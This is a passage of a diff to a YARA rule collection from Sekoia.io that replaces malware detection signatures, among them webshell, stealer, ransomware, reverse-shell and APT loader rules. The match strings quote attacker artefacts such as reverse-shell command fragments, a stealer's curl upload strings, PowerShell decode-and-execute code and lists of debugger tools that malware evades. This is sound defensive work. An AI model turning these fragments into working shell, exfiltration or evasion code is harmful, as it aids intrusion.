-		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
-		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
-		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
-		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
+		$s1 = "ipapi.co/json"
+		$s2 = "a.download("
+		$s3 = "a.click("
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 10KB and filesize < 50KB and ( all of ( $op* ) )
+		$s1 and $s2 and $s3 and filesize < 5000
 }
-rule SEKOIA_Apt_Oilrig_Webshell : FILE
+rule SEKOIA_Apt_Gamaredon_Gammaload_Maliciouslnk : FILE
 {
 	meta:
-		description = "Detects a webshell used by OilRig"
+		description = "Detects Gamaredon's GammaLoad LNK"
 		author = "Sekoia.io"
-		id = "53955117-5176-4682-89ad-1503faba42aa"
-		date = "2024-10-23"
+		id = "2612e6c6-0bda-4bfa-a840-aa0a0b4c945b"
+		date = "2022-08-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_webshell.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0e0879bafa1becf7e4aef008229a79ab8e0c50eda03232abd5cbb8fc59f482d3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_gammaload_maliciouslnk.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "94ba156cd6697a9999b6a4f78c4356ea3382b7b3e7a1af79d488aa34df2c3b40"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246022,26 +246539,25 @@ rule SEKOIA_Apt_Oilrig_Webshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "string d = com;"
-		$ = "string p = fu;"
-		$ = "#@rt12!@$$$nnMF##"
-		$ = "messi(d)))"
+		$mshta = "System32\\mshta.exe"
+		$trait = { 0D 0A ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 0D 0A }
 
 	condition:
-		2 of them and filesize < 80KB
+		uint32be( 0 ) == 0x4c000000 and #trait > 100 and $mshta and filesize > 100KB and filesize < 300KB
 }
-rule SEKOIA_Tool_Cheat_Engine : FILE
+rule SEKOIA_Apt_Unk_Dex_China_Freedom_Trap_Spyware : FILE
 {
 	meta:
-		description = "Detects Cheat Engine driver"
+		description = "Detects China Freedom Trap spyware dex file"
 		author = "Sekoia.io"
-		id = "51d4246c-f7a1-4589-8f97-bd85d1fe4a0e"
-		date = "2024-07-22"
+		id = "3d66b6b8-8397-441a-a337-4a282df39591"
+		date = "2022-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_cheat_engine.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2a70016be13c4eff7f7381fd0e34c345c95f09d4cd8b754ea68d59adfe3fe4b6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unk_dex_china_freedom_trap_spyware.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "ceb70fce74898ea64ded6880a978441c"
+		logic_hash = "f85f78a1a58fa8b2698637f8c540877ea1c5141ff7f74e8c2f2755f5aba5a599"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246049,35 +246565,36 @@ rule SEKOIA_Tool_Cheat_Engine : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "ObOpenObjectByName" wide
-		$s2 = "PsGetProcessImageFileName" wide
-		$s3 = "PsRemoveCreateThreadNotifyRoutine" wide
-		$s4 = "PsSuspendProcess" wide
-		$s5 = "PsResumeProcess" wide
-		$s6 = "\\device\\physicalmemory" wide
-		$log = "%sCPU%d.trace" wide
-		$ioctl_code = {04 E1 22 00}
+		$ = "INSTALL" base64
+		$ = "FAILED" base64
+		$ = "TEST" base64
+		$ = "ONLY" base64
+		$ = "INSTALL" base64
+		$ = "INCONSISTENT" base64
+		$ = "CERTIFICATES" base64
+		$ = "Network country iso:" base64
+		$ = "Network operator name:" base64
+		$ = "SIM operator name:" base64
+		$ = "SIM country iso:" base64
+		$ = "SIM state:" base64
+		$ = "PIN REQUIRED" base64
+		$ = "PUK REQUIRED" base64
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of them
+		uint32be( 0 ) == 0x6465780A and filesize < 100KB and 4 of them
 }
-rule SEKOIA_Apt_Kimsuky_Powershell : FILE
+rule SEKOIA_Apt_Tealkurma_Snappytcp_Reverse_Shell_Strings : FILE
 {
 	meta:
-		description = "Powershell scripts used by Kimsuky. If size < 3KB ok. If between 3 and 15, a check is needed"
+		description = "Detects TealKurma SnappyTCP reverse shell"
 		author = "Sekoia.io"
-		id = "b7f812e0-d08b-40fe-908a-dc5765d6bc66"
-		date = "2024-09-23"
+		id = "e842825c-546c-475a-bc94-7e97aea4e9e0"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_powershell.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "6babb53d881448dc58dd7c32fcd4208a"
-		hash = "29ec7a4495ea512d44d33c9847893200"
-		hash = "fde68771cebd7ecd81721b0dff5b7869"
-		hash = "0c3fd7f45688d5ddb9f0107877ce2fbd"
-		hash = "1a1723be720c1d9cd57cf4a6a112df79"
-		logic_hash = "7436d8cba8a8caaf95786c38c4ceee4426dc7e36ae3eeed5d3162310cd76091d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_tealkurma_snappytcp_reverse_shell_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "feb24cafcf5b080c91dab42bf8d78fbdb0b7fae9395c7513f02aa90a25663d2c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246085,86 +246602,80 @@ rule SEKOIA_Apt_Kimsuky_Powershell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".ToCharArray();[array]::Reverse(" ascii
-		$ = ");$res = -join ($bytes -as [char[]]);Invoke-Expression $res;" ascii
+		$ = "2>&1>/dev/null&" ascii
+		$ = ".php HTTP/1.1" ascii
+		$ = "GET /" ascii
+		$ = "Hostname: %s" ascii
+		$ = "bash -c \"./" ascii
 
 	condition:
-		all of them and filesize < 15KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 3MB and 3 of them
 }
-
-rule SEKOIA_Backdoor_Win_Blackrat : FILE
+rule SEKOIA_Apt_Cerana_Keeper_Yk0130 : FILE
 {
 	meta:
-		description = "Detect Andariel's Black RAT malware"
+		description = "Detects YK0130 reverse shell"
 		author = "Sekoia.io"
-		id = "3a5a6290-6344-45ce-8929-ea5a4451840f"
-		date = "2023-09-04"
+		id = "3da898a9-68e7-472f-8478-a0243840ec0a"
+		date = "2024-10-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_blackrat.yar#L4-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4edf1335e357ebc02e4abb51cd8d808ae39e649cf19cdb3ec667c9cf313181a9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cerana_keeper_yk0130.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "2554e4864294dc96a5b4548dd42c7189"
+		logic_hash = "4462c6b7f46520207f49275292a3be873540becb593176d771d3489fba6f4cb0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c"
 
 	strings:
-		$s1 = "I:/01___Tools/02__RAT/Black/Client_Go/Client.go"
-		$s2 = "I:/01___Tools/02__RAT/Black/Client_Go/Define.go"
-		$s3 = "I:/01___Tools/02__RAT/Black/Client_Go/Screenshot.go"
-		$x1 = "RAT/Black/Client"
+		$pdb = "C:\\Users\\admin\\source\\repos\\YK0130" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( all of ( $s* ) or #x1 >= 3 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "74c4cdc9d33fc63aee7ae9659b6f8d24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "298948afbe85985025e176605ee21176" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e5ca54c5def3c7a950e6d4034dc86277" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "440ae899aea859458df5b6de7dbc5b34" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "98e46f76b965ffb58f6cd53ff8dc91c0" )
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 300KB
 }
-rule SEKOIA_Tool_Juicypotato_Exploit_Strings : FILE
+rule SEKOIA_Launcher_Win_Romcom_Launcher : FILE
 {
 	meta:
-		description = "Detects the JuicyPotato exploit based on strings"
+		description = "Detect the launcher of RomCom malware"
 		author = "Sekoia.io"
-		id = "03d697ae-69a7-490b-8b3c-9a8c21fb46a2"
-		date = "2022-09-09"
+		id = "e8fa8239-a763-4be2-8f34-8e112e65b35e"
+		date = "2022-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_juicypotato_exploit_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ef23ea2931a1b6e094c0d7bb813305c09a2214ce36680ae057926dfdc1105c80"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/launcher_win_romcom_launcher.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7d94f187c3fb85cbfe961dd3b292dc1abd36a8cee7c9ff9ec08c4c1e23d38588"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "JuicyPotato v%s"
-		$ = "-t createprocess call: <t> CreateProcessWithTokenW"
-		$ = "-p <program>: program to launch"
-		$ = "-l <port>: COM server listen port"
-		$ = "-m <ip>: COM server listen address"
-		$ = "-n <port>: RPC server listen port"
-		$ = "Error - Unknown NTLM message type..."
-		$ = "[+] authresult %d"
-		$ = "Waiting for auth..."
+		$ = {43 3a 5c 55 73 65 72 73 5c 31 32 33 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73 5c 69 6e 73 5f 61 73 69 5c 57 69 6e 33 32 5c 52 65 6c 65 61 73 65 5c 73 65 74 75 70 2e 70 64 62}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SEKOIA_Apt_Sofacy_Graphitemalware_Generic : FILE
+rule SEKOIA_Apt_Redhotel_Maliciouslnk_Strings : FILE
 {
 	meta:
-		description = "Detects APT28 graphite malware based on strings"
+		description = "Detects RedHotel's malicious LNKs"
 		author = "Sekoia.io"
-		id = "6b51cfa3-4a7d-4c2a-9fd9-f129b8a18466"
-		date = "2022-09-27"
+		id = "df2f0002-7921-4378-a936-ea0de5fbfa5a"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sofacy_graphitemalware_generic.yar#L3-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f4c994c36768bae6d6e3b5aeefb634e485ab7b483a693781f29d5ff44c71996f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_redhotel_maliciouslnk_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "8e2c17040ec78cbcdc07bb2cf9dd7e01"
+		hash = "dc613a519e515ca817fdfb88f81fc9d7"
+		hash = "6f7d85c196c277a6a619f6d94b8f69b9"
+		hash = "b04d484d1e1d793b04af2a5fb88a8a57"
+		logic_hash = "c1d64b3eca5961d7eaab82a6934299642a70301ef791493a371ae5a29376225f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246172,88 +246683,101 @@ rule SEKOIA_Apt_Sofacy_Graphitemalware_Generic : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider" wide
-		$ = "Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)" wide
-		$ = "%s %04d sp%1d.%1d %s"
-		$ = "%s%c%s%c%s"
-		$ = "InternetReadFile"
-		$ = "ObtainUserAgentString"
-		$ = "CryptImportKey"
+		$ = "desktop-" ascii
+		$ = ".\\1.docx" wide
+		$ = ".\\1.pdf" wide
+		$ = ".\\1.doc" wide
+		$ = ".\\1.ppt" wide
+		$ = ".\\1.pptx" wide
+		$ = "MACOS" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 100KB and ( all of them or pe.imphash ( ) == "c56c322548250651361aef7dacf93eaf" )
+		uint32be( 0 ) == 0x4c000000 and 3 of them
 }
-rule SEKOIA_Apt_Mustangpanda_Mqsttang_Qmagent : FILE
+rule SEKOIA_Rat_Win_Atharvan
 {
 	meta:
-		description = "Detects specifics string of MQsTTang, also known as QMAGENT"
+		description = "Detect Atharvan RAT"
 		author = "Sekoia.io"
-		id = "bcf6f961-0d9b-4fbc-81d2-f5d00c68d4d5"
-		date = "2023-03-27"
+		id = "61347490-d281-4892-adba-89cf6187545f"
+		date = "2023-02-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_mqsttang_qmagent.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4e7aa53e561cad512b031240bce6ad207b80ff7438eee39cd05bb92412aaa632"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_atharvan.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fee9a5a684b3e9bd629a0e87bdf63ba0c1fc1e970ca3b7fec8d7a4f2f60a355a"
 		score = 75
-		quality = 30
-		tags = "FILE"
+		quality = 78
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "iot/server"
-		$s2 = "QMQTT::Message"
-		$s3 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
-		$command1 = "c_topic"
-		$command2 = "Alive"
-		$command3 = "msg"
-		$command4 = "ret"
+		$s1 = {44 3a 5c 72 61 6e 67 5c 54 4f 4f 4c 5c 33 52 41 54}
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		all of them
 }
-rule SEKOIA_Apt_Aptc36_Vbs_Maldoc : FILE
+rule SEKOIA_Apt_Mustangpanda_Tonedrop : FILE
 {
 	meta:
-		description = "Find VBS file used by the threat actor APT-C-36"
+		description = "TONEDROP strings"
 		author = "Sekoia.io"
-		id = "f0ca061f-e94b-4f70-bbd1-8a15193652d3"
-		date = "2022-02-16"
+		id = "39df631c-5766-4804-838f-6c9b800c0cc9"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_aptc36_vbs_maldoc.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cf448731378e97d740d42aa19d1bb81330c3998f07e94ce57bd8d82fc39c6428"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_tonedrop.yar#L1-L43"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "97f9138810fbc56fa1cab671865b3234f63fcd0f9a15ba012dfe76e86c6dbd48"
 		score = 75
-		quality = 51
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dim = "dim " wide ascii
-		$hea = "::::::::::::::::::::::::::::::::::::::::::::::::" wide ascii
-		$str0 = "update" wide ascii nocase
-		$str1 = "On Error Resume Next" wide ascii
-		$str2 = "CreateObject" wide ascii
-		$str3 = "WScript" wide ascii
+		$window1 = "PROCMON_WINDOW_CLASS" ascii wide
+		$window2 = "OLLYDBG" ascii wide
+		$window3 = "WinDbgFrameClass" ascii wide
+		$window4 = "OllyDbg - [CPU]" ascii wide
+		$window5 = "Immunity Debugger - [CPU]" ascii wide
+		$errormsg1 = "Unable to open file %s for writing" ascii wide
+		$proc_01 = "cheatengine-x86_64.exe" ascii wide
+		$proc_02 = "ollydbg.exe" ascii wide
+		$proc_03 = "ida.exe" ascii wide
+		$proc_04 = "ida64.exe" ascii wide
+		$proc_05 = "radare2.exe" ascii wide
+		$proc_06 = "x64dbg.exe" ascii wide
+		$proc_07 = "procmon.exe" ascii wide
+		$proc_08 = "procmon64.exe" ascii wide
+		$proc_09 = "procexp.exe" ascii wide
+		$proc_10 = "processhacker.exe" ascii wide
+		$proc_11 = "pestudio.exe" ascii wide
+		$proc_12 = "systracerx32.exe" ascii wide
+		$proc_13 = "fiddler.exe" ascii wide
+		$proc_14 = "tcpview.exe" ascii wide
+		$opcodes_check_PEsize = {C7 85 94 FD FF FF 2C 02}
+		$opcodes_ShellExecute_1 = {C7 45 BC 53 68 65 6C}
+		$opcodes_ShellExecute_2 = {C7 45 C0 6C 45 78 65}
+		$opcodes_ShellExecute_3 = {C7 45 C4 63 75 74 65}
+		$opcodes_ShellExecute_4 = {66 C7 45 C8 41 00}
 
 	condition:
-		#dim> 5 and #hea > 10 and 2 of ( $str* ) and filesize > 10KB and filesize < 1MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and 3 of ( $window* ) and $errormsg1 and 10 of ( $proc_* ) and 3 of ( $opcodes* )
 }
-rule SEKOIA_Exploit_Linux_Eop_Pwnkit_Strings : FILE
+rule SEKOIA_Apt_Apt37_Malicious_Hta_File : FILE
 {
 	meta:
-		description = "Detects Pwnkit Local Privesc exploit"
+		description = "Detects malicious APT37 files"
 		author = "Sekoia.io"
-		id = "8637c602-62da-4983-bcb7-ba546fb2ed82"
-		date = "2023-12-08"
+		id = "22a98c27-8ff4-4760-b505-f8eacf4dabda"
+		date = "2023-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_pwnkit_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9805cc7a6022f7a3372df5d74cef68c6fd0e51072154c82212415846f3603667"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt37_malicious_hta_file.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "85289bea86641ea9c359c361d075783449d453017485170abc87c47872792210"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246261,63 +246785,61 @@ rule SEKOIA_Exploit_Linux_Eop_Pwnkit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "CHARSET=PWNKIT"
-		$ = "i/do/not/exists"
-		$ = "pwnkit/pwnkit.c"
-		$ = "/usr/bin/pkexec"
-		$ = "SHELL=pwnkit"
-		$ = "pwnkit.so"
-		$ = "./pwnkit/"
+		$s1 = "<HTML>" nocase
+		$s2 = " UwB0AGEAcgB0AC0AUwBs" ascii
+		$s3 = "= new ActiveXObject(" ascii
+		$s4 = "\", \"\", \"open\", 0);" ascii
+		$s5 = ".moveTo(" ascii
+		$s6 = "self.close();"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 2 of them
+		$s1 at 0 and all of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Apt29_Malicious_Rdp_File : FILE
+rule SEKOIA_Ransomware_Linux_Icefire_2023 : FILE
 {
 	meta:
-		description = "Detects malicious RDP files"
+		description = "Rule to detect Linux IceFire ransomware samples."
 		author = "Sekoia.io"
-		id = "a7b092b5-53a1-4638-a6c1-733d3f063139"
-		date = "2024-10-25"
+		id = "b04964f4-3fdc-4745-9f4a-95a5a79bc7e1"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt29_malicious_rdp_file.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "db326d934e386059cc56c4e61695128e"
-		hash = "b38e7e8bba44bc5619b2689024ad9fca"
-		hash = "f58cf55b944f5942f1d120d95140b800"
-		hash = "40f957b756096fa6b80f95334ba92034"
-		logic_hash = "da9d8dfbbf82f48c8b880cbde21f75ecd1e9f779e462da5ced32b6587c71eaf2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_linux_icefire_2023.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "25033bd33311b070809d150f60803f32011d78a6a74d6b5f620a3216f0f95a6e"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e9cc7fdfa3cf40ff9c3db0248a79f4817b170f2660aa2b2ed6c551eae1c38e0b"
 
 	strings:
-		$ = "RedirectPrinters" wide
-		$ = "RedirectCOMPorts" wide
-		$ = "RedirectSmartCards" wide
-		$ = "RedirectPOSDevices" wide
-		$ = "RedirectClipboard" wide
-		$ = "DrivesToRedirect" wide
-		$ = "full address:s:" wide
+		$string01 = "********************Your network has been infected!!!********************"
+		$string02 = "IMPORTANT : DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED!!!"
+		$string03 = "username:"
+		$string04 = "password:"
+		$string05 = ".cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb"
+		$string06 = "./boot./dev./etc./lib./proc./srv./sys./usr./var./run"
+		$string07 = "/iFire-readme.txt"
+		$string08 = ".iFire"
+		$string09 = "iFire.pid"
 
 	condition:
-		uint16be( 0 ) == 0xFFFE and all of them and filesize < 20KB
+		uint32be( 0 ) == 0x7F454C46 and all of them
 }
-rule SEKOIA_Apt_Rusticweb_Stealer : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Screenshot_Module : FILE
 {
 	meta:
-		description = "Detects stealer used by RusticWeb"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "813072e0-28de-4cb7-b2cc-71d77a1e8508"
-		date = "2024-01-09"
+		id = "d1ef0bd1-37dc-405f-b82b-288b1798455c"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_rusticweb_stealer.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "68f802ef442e68cbcca789eae2bb8a4395af86699320e5a8101c07469e7555fb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_commonmagic_screenshot_module.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "caab57534a00620974f7d49c7b38a3f191aca596b69b3e4c499e3099023c2f9c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246325,52 +246847,51 @@ rule SEKOIA_Apt_Rusticweb_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "-FTT=@"
-		$s2 = "https://oshi.at"
-		$s3 = "curl-T"
-		$s4 = "upload/upload.php"
-		$s5 = "cargo"
+		$ = "%s_%02d.%02d.%04d_%02d.%02d.%02d.%03d.%s" wide
+		$ = "Screenshot" wide
+		$ = "\\\\.\\pipe\\PipeDtMd" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Loader_Win_Squirrelwaffle_Doc : FILE
+rule SEKOIA_Hacktool_Socat_Strings : FILE
 {
 	meta:
-		description = "Detect the Squirrelwaffle malicious document (not xls)"
+		description = "Detects socat"
 		author = "Sekoia.io"
-		id = "caadeac3-d4c7-4d84-b539-c03cc4c6c274"
-		date = "2021-09-20"
+		id = "7c7e4085-39b2-445e-a9ff-52f21936e714"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_squirrelwaffle_doc.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b9f7c3605e25c8c7caa5f70e492d46fb70e7cb6002704440e7346ebfb2bbc7bf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_socat_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8f0c907fa2de4141c55073ea5b4a8174f50c716fc7a60d3e838115859a938084"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {4f4b31203d2022636d64202f632072756e646c6c33322e65786520433a5c50726f6772616d446174615c777777312e646c6c2c6c647222}
-		$s2 = {4145524f2042495a20434f4d20434f4f502045445520474f5620494e464f20494e54204d494c204d555345554d204e414d45204e4554204f52472050524f}
+		$ = "[options] <bi-address> <bi-address>"
+		$ = "version %s on %s"
+		$ = "socat_signal():"
 
 	condition:
-		any of them and filesize > 100KB
